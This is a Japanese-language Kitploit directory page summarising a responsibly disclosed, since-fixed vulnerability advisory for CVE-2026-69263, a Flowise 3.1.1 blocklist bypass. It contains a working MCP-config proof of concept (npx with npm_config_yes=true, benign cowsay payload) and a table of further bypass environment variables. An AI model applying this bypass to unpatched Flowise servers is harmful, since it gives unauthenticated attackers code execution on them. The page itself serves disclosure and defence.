Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-69263 — MCP環境変数ブロックリストのバイパスにより、Flowise 3.1.1で未認証のRCEが発生する | Kitploit
ツール/GitHubGitHub/leoelsolh/cve-2026-69263
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubleoelsolh/cve-2026-69263

CVE-2026-69263

MCP環境変数ブロックリストのバイパスにより、Flowise 3.1.1で未認証のRCEが発生する

リポジトリを見る
21ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE 2026-69263

[ 内容 ]

CVE 2026-69263は、2025年8月に修正された旧RCE脆弱性のパッチバイパスです。このパッチは、任意のパッケージのインストールをブロックする拒否リストを導入しました。

[ 方法 ]

npmは環境変数から設定を読み取るため、環境変数 npm_config_yes=true を設定すると、ブロックされていた動作が再び有効になります。

[ 影響 ]

Flowise 3.1.1(報告時点での最新版)。3.1.3で修正済み。

[ PoC ]

以下のMCPサーバー構成は、CUSTOM_MCP_SECURITY_CHECK=true を使用してパッチをバイパスします。

{
  "mcpServers": {
    "bypass": {
      "command": "npx",
      "args": ["cowsay"],
      "env": {
        "npm_config_yes": "true"
      }
    }
  }
}

cowsayは、ここでは実行を証明するためだけに使用される無害なパッケージです。実際の攻撃者は独自のペイロードに置き換えるでしょう。

実行経路:

  1. validateCommandFlags は、args にブロックされたフラグが含まれていないため、パスします。
  2. validateEnvironmentVariables は、npm_config_yes が4項目のブロックリストに含まれていないため、パスします。
  3. npx が指定されたパッケージを自動インストールして実行し、Flowiseプロセスの権限で任意の実行が可能であることを証明します。

認証なしのデフォルトデプロイでは、Flowise APIに到達できる認証されていないユーザーは誰でもこれをトリガーできます。

追加のバイパスベクトル (同じ根本原因)

以下の変数もブロックリストに含まれておらず、他の許可されたインタープリターを介して実行に影響を与えます。

変数コマンド効果
npm_config_prefixnpxパッケージのインストールを攻撃者が制御するパスにリダイレクトします
npm_config_userconfignpx攻撃者が制御する .npmrc 設定を読み込みます
NODE_PATHnode攻撃者が制御するパスからモジュールを読み込みます
PYTHONPATHpython3攻撃者が制御するパスからモジュールを読み込みます
PYTHONSTARTUPpython3インタープリター起動時にファイルを実行します (対話セッションのみ)

[ 開示 ]

このRCE脆弱性は、FlowiseのメンテナーにGitHubリポジトリを通じて責任を持って開示されました。レポートはこちらから確認できます。

[ 参照 ]

  • CVE-2026-69263
  • Flowise セキュリティアドバイザリレポート
  • leoelsolh - CVE-2026-69263
  • 修正 (PR #6471)
  • CVE-2025-8943
  • CWE-184: 許可されていない入力の不完全なリスト
ツールをダウンロード